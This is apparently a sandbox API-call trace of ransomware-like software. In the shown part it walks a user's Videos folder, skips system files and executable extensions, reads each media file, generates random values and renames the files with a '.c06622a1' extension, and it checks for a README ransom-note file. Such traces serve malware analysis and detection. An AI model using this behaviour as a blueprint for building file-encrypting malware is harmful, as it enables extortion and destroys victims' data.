[0168.617] _wcsicmp (_Str1="386", _Str2="mp4") returned -58 [0168.617] wcslen (_String="386") returned 0x3 [0168.617] _wcsicmp (_Str1="adv", _Str2="mp4") returned -12 [0168.617] wcslen (_String="adv") returned 0x3 [0168.617] _wcsicmp (_Str1="ani", _Str2="mp4") returned -12 [0168.617] wcslen (_String="ani") returned 0x3 [0168.617] _wcsicmp (_Str1="bat", _Str2="mp4") returned -11 [0168.617] wcslen (_String="bat") returned 0x3 [0168.617] _wcsicmp (_Str1="bin", _Str2="mp4") returned -11 [0168.617] wcslen (_String="bin") returned 0x3 [0168.617] _wcsicmp (_Str1="cab", _Str2="mp4") returned -10 [0168.617] wcslen (_String="cab") returned 0x3 [0168.617] _wcsicmp (_Str1="cmd", _Str2="mp4") returned -10 [0168.617] wcslen (_String="cmd") returned 0x3 [0168.617] _wcsicmp (_Str1="com", _Str2="mp4") returned -10 [0168.617] wcslen (_String="com") returned 0x3 [0168.617] _wcsicmp (_Str1="cpl", _Str2="mp4") returned -10 [0168.617] wcslen (_String="cpl") returned 0x3 [0168.617] _wcsicmp (_Str1="cur", _Str2="mp4") returned -10 [0168.618] wcslen (_String="cur") returned 0x3 [0168.618] _wcsicmp (_Str1="deskthemepack", _Str2="mp4") returned -9 [0168.618] wcslen (_String="deskthemepack") returned 0xd [0168.618] _wcsicmp (_Str1="diagcab", _Str2="mp4") returned -9 [0168.618] wcslen (_String="diagcab") returned 0x7 [0168.618] _wcsicmp (_Str1="diagcfg", _Str2="mp4") returned -9 [0168.618] wcslen (_String="diagcfg") returned 0x7 [0168.618] _wcsicmp (_Str1="diagpkg", _Str2="mp4") returned -9 [0168.618] wcslen (_String="diagpkg") returned 0x7 [0168.618] _wcsicmp (_Str1="dll", _Str2="mp4") returned -9 [0168.618] wcslen (_String="dll") returned 0x3 [0168.618] _wcsicmp (_Str1="drv", _Str2="mp4") returned -9 [0168.618] wcslen (_String="drv") returned 0x3 [0168.618] _wcsicmp (_Str1="exe", _Str2="mp4") returned -8 [0168.618] wcslen (_String="exe") returned 0x3 [0168.618] _wcsicmp (_Str1="hlp", _Str2="mp4") returned -5 [0168.618] wcslen (_String="hlp") returned 0x3 [0168.618] _wcsicmp (_Str1="icl", _Str2="mp4") returned -4 [0168.618] wcslen (_String="icl") returned 0x3 [0168.618] _wcsicmp (_Str1="icns", _Str2="mp4") returned -4 [0168.618] wcslen (_String="icns") returned 0x4 [0168.618] _wcsicmp (_Str1="ico", _Str2="mp4") returned -4 [0168.618] wcslen (_String="ico") returned 0x3 [0168.618] _wcsicmp (_Str1="ics", _Str2="mp4") returned -4 [0168.618] wcslen (_String="ics") returned 0x3 [0168.618] _wcsicmp (_Str1="idx", _Str2="mp4") returned -4 [0168.618] wcslen (_String="idx") returned 0x3 [0168.618] _wcsicmp (_Str1="ldf", _Str2="mp4") returned -1 [0168.618] wcslen (_String="ldf") returned 0x3 [0168.618] _wcsicmp (_Str1="lnk", _Str2="mp4") returned -1 [0168.619] wcslen (_String="lnk") returned 0x3 [0168.619] _wcsicmp (_Str1="mod", _Str2="mp4") returned -1 [0168.619] wcslen (_String="mod") returned 0x3 [0168.619] _wcsicmp (_Str1="mpa", _Str2="mp4") returned 45 [0168.619] wcslen (_String="mpa") returned 0x3 [0168.619] _wcsicmp (_Str1="msc", _Str2="mp4") returned 3 [0168.619] wcslen (_String="msc") returned 0x3 [0168.619] _wcsicmp (_Str1="msp", _Str2="mp4") returned 3 [0168.619] wcslen (_String="msp") returned 0x3 [0168.619] _wcsicmp (_Str1="msstyles", _Str2="mp4") returned 3 [0168.619] wcslen (_String="msstyles") returned 0x8 [0168.619] _wcsicmp (_Str1="msu", _Str2="mp4") returned 3 [0168.619] wcslen (_String="msu") returned 0x3 [0168.619] _wcsicmp (_Str1="nls", _Str2="mp4") returned 1 [0168.619] wcslen (_String="nls") returned 0x3 [0168.619] _wcsicmp (_Str1="nomedia", _Str2="mp4") returned 1 [0168.619] wcslen (_String="nomedia") returned 0x7 [0168.619] _wcsicmp (_Str1="ocx", _Str2="mp4") returned 2 [0168.619] wcslen (_String="ocx") returned 0x3 [0168.619] _wcsicmp (_Str1="prf", _Str2="mp4") returned 3 [0168.619] wcslen (_String="prf") returned 0x3 [0168.619] _wcsicmp (_Str1="ps1", _Str2="mp4") returned 3 [0168.619] wcslen (_String="ps1") returned 0x3 [0168.619] _wcsicmp (_Str1="rom", _Str2="mp4") returned 5 [0168.619] wcslen (_String="rom") returned 0x3 [0168.619] _wcsicmp (_Str1="rtp", _Str2="mp4") returned 5 [0168.619] wcslen (_String="rtp") returned 0x3 [0168.619] _wcsicmp (_Str1="scr", _Str2="mp4") returned 6 [0168.619] wcslen (_String="scr") returned 0x3 [0168.620] _wcsicmp (_Str1="shs", _Str2="mp4") returned 6 [0168.620] wcslen (_String="shs") returned 0x3 [0168.620] _wcsicmp (_Str1="spl", _Str2="mp4") returned 6 [0168.620] wcslen (_String="spl") returned 0x3 [0168.620] _wcsicmp (_Str1="sys", _Str2="mp4") returned 6 [0168.620] wcslen (_String="sys") returned 0x3 [0168.620] _wcsicmp (_Str1="theme", _Str2="mp4") returned 7 [0168.620] wcslen (_String="theme") returned 0x5 [0168.620] _wcsicmp (_Str1="themepack", _Str2="mp4") returned 7 [0168.620] wcslen (_String="themepack") returned 0x9 [0168.620] _wcsicmp (_Str1="wpx", _Str2="mp4") returned 10 [0168.620] wcslen (_String="wpx") returned 0x3 [0168.620] _wcsicmp (_Str1="lock", _Str2="mp4") returned -1 [0168.620] wcslen (_String="lock") returned 0x4 [0168.620] _wcsicmp (_Str1="key", _Str2="mp4") returned -2 [0168.620] wcslen (_String="key") returned 0x3 [0168.620] _wcsicmp (_Str1="hta", _Str2="mp4") returned -5 [0168.620] wcslen (_String="hta") returned 0x3 [0168.620] _wcsicmp (_Str1="msi", _Str2="mp4") returned 3 [0168.620] wcslen (_String="msi") returned 0x3 [0168.620] _wcsicmp (_Str1="pdb", _Str2="mp4") returned 3 [0168.620] wcslen (_String="pdb") returned 0x3 [0168.620] _wcsicmp (_Str1="sqlite", _Str2="mp4") returned 6 [0168.620] wcslen (_String="sqlite") returned 0x6 [0168.620] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg")) returned 0x10 [0168.620] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0168.621] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" [0168.621] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG") returned 0x36 [0168.621] wcscpy (in: _Dest=0x32400ce, _Source="x5Lo x.mp4" | out: _Dest="x5Lo x.mp4") returned="x5Lo x.mp4" [0168.621] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\x5Lo x.mp4", dwFileAttributes=0x80) returned 1 [0168.621] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\x5Lo x.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\x5lo x.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0168.621] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.621] ReadFile (in: hFile=0x1a4, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0168.622] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x30aa351d [0168.622] RtlComputeCrc32 (PartialCrc=0x351d, Buffer=0x32e9a4, Length=0x80) returned 0x3807a3e9 [0168.622] RtlComputeCrc32 (PartialCrc=0xa3e9, Buffer=0x32e9a4, Length=0x80) returned 0x7443da23 [0168.622] RtlComputeCrc32 (PartialCrc=0xda23, Buffer=0x32e9a4, Length=0x80) returned 0xe8dbff41 [0168.622] RtlComputeCrc32 (PartialCrc=0xff41, Buffer=0x32e9a4, Length=0x80) returned 0xa3371fcb [0168.622] CloseHandle (hObject=0x1a4) returned 1 [0168.622] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0168.622] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\x5Lo x.mp4" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\x5Lo x.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\x5Lo x.mp4" [0168.622] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\x5Lo x.mp4") returned 0x41 [0168.622] wcscpy (in: _Dest=0x32500ea, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.622] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\x5Lo x.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\x5lo x.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\x5Lo x.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\x5lo x.mp4.c06622a1"), dwFlags=0x8) returned 1 [0168.630] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\x5Lo x.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\x5lo x.mp4.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a4 [0168.630] CreateIoCompletionPort (FileHandle=0x1a4, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0168.630] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x4010020 [0168.640] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x204a117e [0168.640] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x56217d5f [0168.640] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4e90a83b [0168.640] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5a19bcd0 [0168.640] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1d3a1b16 [0168.640] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x167f0c4d [0168.641] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4c50952d [0168.641] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7fe53fd4 [0168.644] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4010094, Length=0x80) returned 0x9bd16229 [0168.644] RtlComputeCrc32 (PartialCrc=0x6229, Buffer=0x4010094, Length=0x80) returned 0x351a6046 [0168.644] RtlComputeCrc32 (PartialCrc=0x6046, Buffer=0x4010094, Length=0x80) returned 0xc54a2edb [0168.644] RtlComputeCrc32 (PartialCrc=0x2edb, Buffer=0x4010094, Length=0x80) returned 0x4e30586d [0168.644] RtlComputeCrc32 (PartialCrc=0x586d, Buffer=0x4010094, Length=0x80) returned 0x2e1cd679 [0168.644] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4010020) returned 1 [0168.644] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0168.644] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0168.644] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb0c02a0, ftCreationTime.dwHighDateTime=0x1d5dd03, ftLastAccessTime.dwLowDateTime=0xef12c8a0, ftLastAccessTime.dwHighDateTime=0x1d5e677, ftLastWriteTime.dwLowDateTime=0xef12c8a0, ftLastWriteTime.dwHighDateTime=0x1d5e677, nFileSizeHigh=0x0, nFileSizeLow=0x2765, dwReserved0=0x0, dwReserved1=0x0, cFileName="xMlh1 1LcDLUA.flv", cAlternateFileName="XMLH11~1.FLV")) returned 1 [0168.644] _wcsicmp (_Str1="xMlh1 1LcDLUA.flv", _Str2="README.c06622a1.TXT") returned 6 [0168.644] wcsstr (_Str="xMlh1 1LcDLUA.flv", _SubStr="README") returned 0x0 [0168.645] _wcsicmp (_Str1="autorun.inf", _Str2="xMlh1 1LcDLUA.flv") returned -23 [0168.645] wcslen (_String="autorun.inf") returned 0xb [0168.645] _wcsicmp (_Str1="boot.ini", _Str2="xMlh1 1LcDLUA.flv") returned -22 [0168.645] wcslen (_String="boot.ini") returned 0x8 [0168.645] _wcsicmp (_Str1="bootfont.bin", _Str2="xMlh1 1LcDLUA.flv") returned -22 [0168.645] wcslen (_String="bootfont.bin") returned 0xc [0168.645] _wcsicmp (_Str1="bootsect.bak", _Str2="xMlh1 1LcDLUA.flv") returned -22 [0168.645] wcslen (_String="bootsect.bak") returned 0xc [0168.645] _wcsicmp (_Str1="desktop.ini", _Str2="xMlh1 1LcDLUA.flv") returned -20 [0168.645] wcslen (_String="desktop.ini") returned 0xb [0168.645] _wcsicmp (_Str1="iconcache.db", _Str2="xMlh1 1LcDLUA.flv") returned -15 [0168.645] wcslen (_String="iconcache.db") returned 0xc [0168.645] _wcsicmp (_Str1="ntldr", _Str2="xMlh1 1LcDLUA.flv") returned -10 [0168.645] wcslen (_String="ntldr") returned 0x5 [0168.645] _wcsicmp (_Str1="ntuser.dat", _Str2="xMlh1 1LcDLUA.flv") returned -10 [0168.645] wcslen (_String="ntuser.dat") returned 0xa [0168.645] _wcsicmp (_Str1="ntuser.dat.log", _Str2="xMlh1 1LcDLUA.flv") returned -10 [0168.646] wcslen (_String="ntuser.dat.log") returned 0xe [0168.646] _wcsicmp (_Str1="ntuser.ini", _Str2="xMlh1 1LcDLUA.flv") returned -10 [0168.646] wcslen (_String="ntuser.ini") returned 0xa [0168.646] _wcsicmp (_Str1="thumbs.db", _Str2="xMlh1 1LcDLUA.flv") returned -4 [0168.646] wcslen (_String="thumbs.db") returned 0x9 [0168.646] _wcsicmp (_Str1="386", _Str2="flv") returned -51 [0168.646] wcslen (_String="386") returned 0x3 [0168.646] _wcsicmp (_Str1="adv", _Str2="flv") returned -5 [0168.646] wcslen (_String="adv") returned 0x3 [0168.646] _wcsicmp (_Str1="ani", _Str2="flv") returned -5 [0168.646] wcslen (_String="ani") returned 0x3 [0168.646] _wcsicmp (_Str1="bat", _Str2="flv") returned -4 [0168.646] wcslen (_String="bat") returned 0x3 [0168.646] _wcsicmp (_Str1="bin", _Str2="flv") returned -4 [0168.646] wcslen (_String="bin") returned 0x3 [0168.646] _wcsicmp (_Str1="cab", _Str2="flv") returned -3 [0168.646] wcslen (_String="cab") returned 0x3 [0168.646] _wcsicmp (_Str1="cmd", _Str2="flv") returned -3 [0168.647] wcslen (_String="cmd") returned 0x3 [0168.647] _wcsicmp (_Str1="com", _Str2="flv") returned -3 [0168.647] wcslen (_String="com") returned 0x3 [0168.647] _wcsicmp (_Str1="cpl", _Str2="flv") returned -3 [0168.647] wcslen (_String="cpl") returned 0x3 [0168.647] _wcsicmp (_Str1="cur", _Str2="flv") returned -3 [0168.647] wcslen (_String="cur") returned 0x3 [0168.647] _wcsicmp (_Str1="deskthemepack", _Str2="flv") returned -2 [0168.647] wcslen (_String="deskthemepack") returned 0xd [0168.647] _wcsicmp (_Str1="diagcab", _Str2="flv") returned -2 [0168.647] wcslen (_String="diagcab") returned 0x7 [0168.647] _wcsicmp (_Str1="diagcfg", _Str2="flv") returned -2 [0168.647] wcslen (_String="diagcfg") returned 0x7 [0168.647] _wcsicmp (_Str1="diagpkg", _Str2="flv") returned -2 [0168.647] wcslen (_String="diagpkg") returned 0x7 [0168.647] _wcsicmp (_Str1="dll", _Str2="flv") returned -2 [0168.647] wcslen (_String="dll") returned 0x3 [0168.647] _wcsicmp (_Str1="drv", _Str2="flv") returned -2 [0168.648] wcslen (_String="drv") returned 0x3 [0168.648] _wcsicmp (_Str1="exe", _Str2="flv") returned -1 [0168.648] wcslen (_String="exe") returned 0x3 [0168.648] _wcsicmp (_Str1="hlp", _Str2="flv") returned 2 [0168.648] wcslen (_String="hlp") returned 0x3 [0168.648] _wcsicmp (_Str1="icl", _Str2="flv") returned 3 [0168.648] wcslen (_String="icl") returned 0x3 [0168.648] _wcsicmp (_Str1="icns", _Str2="flv") returned 3 [0168.648] wcslen (_String="icns") returned 0x4 [0168.648] _wcsicmp (_Str1="ico", _Str2="flv") returned 3 [0168.648] wcslen (_String="ico") returned 0x3 [0168.648] _wcsicmp (_Str1="ics", _Str2="flv") returned 3 [0168.648] wcslen (_String="ics") returned 0x3 [0168.648] _wcsicmp (_Str1="idx", _Str2="flv") returned 3 [0168.648] wcslen (_String="idx") returned 0x3 [0168.648] _wcsicmp (_Str1="ldf", _Str2="flv") returned 6 [0168.648] wcslen (_String="ldf") returned 0x3 [0168.648] _wcsicmp (_Str1="lnk", _Str2="flv") returned 6 [0168.649] wcslen (_String="lnk") returned 0x3 [0168.649] _wcsicmp (_Str1="mod", _Str2="flv") returned 7 [0168.649] wcslen (_String="mod") returned 0x3 [0168.649] _wcsicmp (_Str1="mpa", _Str2="flv") returned 7 [0168.649] wcslen (_String="mpa") returned 0x3 [0168.649] _wcsicmp (_Str1="msc", _Str2="flv") returned 7 [0168.649] wcslen (_String="msc") returned 0x3 [0168.649] _wcsicmp (_Str1="msp", _Str2="flv") returned 7 [0168.649] wcslen (_String="msp") returned 0x3 [0168.649] _wcsicmp (_Str1="msstyles", _Str2="flv") returned 7 [0168.649] wcslen (_String="msstyles") returned 0x8 [0168.649] _wcsicmp (_Str1="msu", _Str2="flv") returned 7 [0168.649] wcslen (_String="msu") returned 0x3 [0168.649] _wcsicmp (_Str1="nls", _Str2="flv") returned 8 [0168.649] wcslen (_String="nls") returned 0x3 [0168.649] _wcsicmp (_Str1="nomedia", _Str2="flv") returned 8 [0168.649] wcslen (_String="nomedia") returned 0x7 [0168.649] _wcsicmp (_Str1="ocx", _Str2="flv") returned 9 [0168.650] wcslen (_String="ocx") returned 0x3 [0168.650] _wcsicmp (_Str1="prf", _Str2="flv") returned 10 [0168.650] wcslen (_String="prf") returned 0x3 [0168.650] _wcsicmp (_Str1="ps1", _Str2="flv") returned 10 [0168.650] wcslen (_String="ps1") returned 0x3 [0168.650] _wcsicmp (_Str1="rom", _Str2="flv") returned 12 [0168.650] wcslen (_String="rom") returned 0x3 [0168.650] _wcsicmp (_Str1="rtp", _Str2="flv") returned 12 [0168.650] wcslen (_String="rtp") returned 0x3 [0168.650] _wcsicmp (_Str1="scr", _Str2="flv") returned 13 [0168.650] wcslen (_String="scr") returned 0x3 [0168.650] _wcsicmp (_Str1="shs", _Str2="flv") returned 13 [0168.650] wcslen (_String="shs") returned 0x3 [0168.650] _wcsicmp (_Str1="spl", _Str2="flv") returned 13 [0168.650] wcslen (_String="spl") returned 0x3 [0168.650] _wcsicmp (_Str1="sys", _Str2="flv") returned 13 [0168.650] wcslen (_String="sys") returned 0x3 [0168.650] _wcsicmp (_Str1="theme", _Str2="flv") returned 14 [0168.651] wcslen (_String="theme") returned 0x5 [0168.651] _wcsicmp (_Str1="themepack", _Str2="flv") returned 14 [0168.651] wcslen (_String="themepack") returned 0x9 [0168.651] _wcsicmp (_Str1="wpx", _Str2="flv") returned 17 [0168.651] wcslen (_String="wpx") returned 0x3 [0168.651] _wcsicmp (_Str1="lock", _Str2="flv") returned 6 [0168.651] wcslen (_String="lock") returned 0x4 [0168.651] _wcsicmp (_Str1="key", _Str2="flv") returned 5 [0168.651] wcslen (_String="key") returned 0x3 [0168.651] _wcsicmp (_Str1="hta", _Str2="flv") returned 2 [0168.651] wcslen (_String="hta") returned 0x3 [0168.651] _wcsicmp (_Str1="msi", _Str2="flv") returned 7 [0168.651] wcslen (_String="msi") returned 0x3 [0168.651] _wcsicmp (_Str1="pdb", _Str2="flv") returned 10 [0168.651] wcslen (_String="pdb") returned 0x3 [0168.651] _wcsicmp (_Str1="sqlite", _Str2="flv") returned 13 [0168.651] wcslen (_String="sqlite") returned 0x6 [0168.651] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg")) returned 0x10 [0168.652] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0168.652] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" [0168.652] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG") returned 0x36 [0168.652] wcscpy (in: _Dest=0x32400ce, _Source="xMlh1 1LcDLUA.flv" | out: _Dest="xMlh1 1LcDLUA.flv") returned="xMlh1 1LcDLUA.flv" [0168.652] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\xMlh1 1LcDLUA.flv", dwFileAttributes=0x80) returned 1 [0168.657] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\xMlh1 1LcDLUA.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\xmlh1 1lcdlua.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0168.657] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.657] ReadFile (in: hFile=0x1cc, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0168.658] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x89677125 [0168.658] RtlComputeCrc32 (PartialCrc=0x7125, Buffer=0x32e9a4, Length=0x80) returned 0xa44684f4 [0168.658] RtlComputeCrc32 (PartialCrc=0x84f4, Buffer=0x32e9a4, Length=0x80) returned 0x2ae09f85 [0168.658] RtlComputeCrc32 (PartialCrc=0x9f85, Buffer=0x32e9a4, Length=0x80) returned 0x8aeb8aa4 [0168.658] RtlComputeCrc32 (PartialCrc=0x8aa4, Buffer=0x32e9a4, Length=0x80) returned 0x1cee2656 [0168.658] CloseHandle (hObject=0x1cc) returned 1 [0168.658] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0168.659] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\xMlh1 1LcDLUA.flv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\xMlh1 1LcDLUA.flv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\xMlh1 1LcDLUA.flv" [0168.659] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\xMlh1 1LcDLUA.flv") returned 0x48 [0168.659] wcscpy (in: _Dest=0x32500f8, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.659] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\xMlh1 1LcDLUA.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\xmlh1 1lcdlua.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\xMlh1 1LcDLUA.flv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\xmlh1 1lcdlua.flv.c06622a1"), dwFlags=0x8) returned 1 [0168.667] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\xMlh1 1LcDLUA.flv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\xmlh1 1lcdlua.flv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1cc [0168.668] CreateIoCompletionPort (FileHandle=0x1cc, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0168.668] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x40a0020 [0168.676] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x285de8 [0168.676] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x70b758e9 [0168.676] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1f172514 [0168.676] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4994c592 [0168.676] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x38bb02e3 [0168.676] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6a236ac7 [0168.676] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x69bf0743 [0168.676] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2b7ffd85 [0168.679] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x40a0094, Length=0x80) returned 0xe74809d6 [0168.679] RtlComputeCrc32 (PartialCrc=0x9d6, Buffer=0x40a0094, Length=0x80) returned 0xf70ead28 [0168.679] RtlComputeCrc32 (PartialCrc=0xad28, Buffer=0x40a0094, Length=0x80) returned 0x40757d03 [0168.679] RtlComputeCrc32 (PartialCrc=0x7d03, Buffer=0x40a0094, Length=0x80) returned 0x3431dc73 [0168.679] RtlComputeCrc32 (PartialCrc=0xdc73, Buffer=0x40a0094, Length=0x80) returned 0x3940d958 [0168.679] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x40a0020) returned 1 [0168.679] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0168.679] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0168.679] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1d8a670, ftCreationTime.dwHighDateTime=0x1d5dd50, ftLastAccessTime.dwLowDateTime=0x163f33d0, ftLastAccessTime.dwHighDateTime=0x1d5df31, ftLastWriteTime.dwLowDateTime=0x163f33d0, ftLastWriteTime.dwHighDateTime=0x1d5df31, nFileSizeHigh=0x0, nFileSizeLow=0x6595, dwReserved0=0x0, dwReserved1=0x0, cFileName="Z-F8O23mq.mp4", cAlternateFileName="Z-F8O2~1.MP4")) returned 1 [0168.679] _wcsicmp (_Str1="Z-F8O23mq.mp4", _Str2="README.c06622a1.TXT") 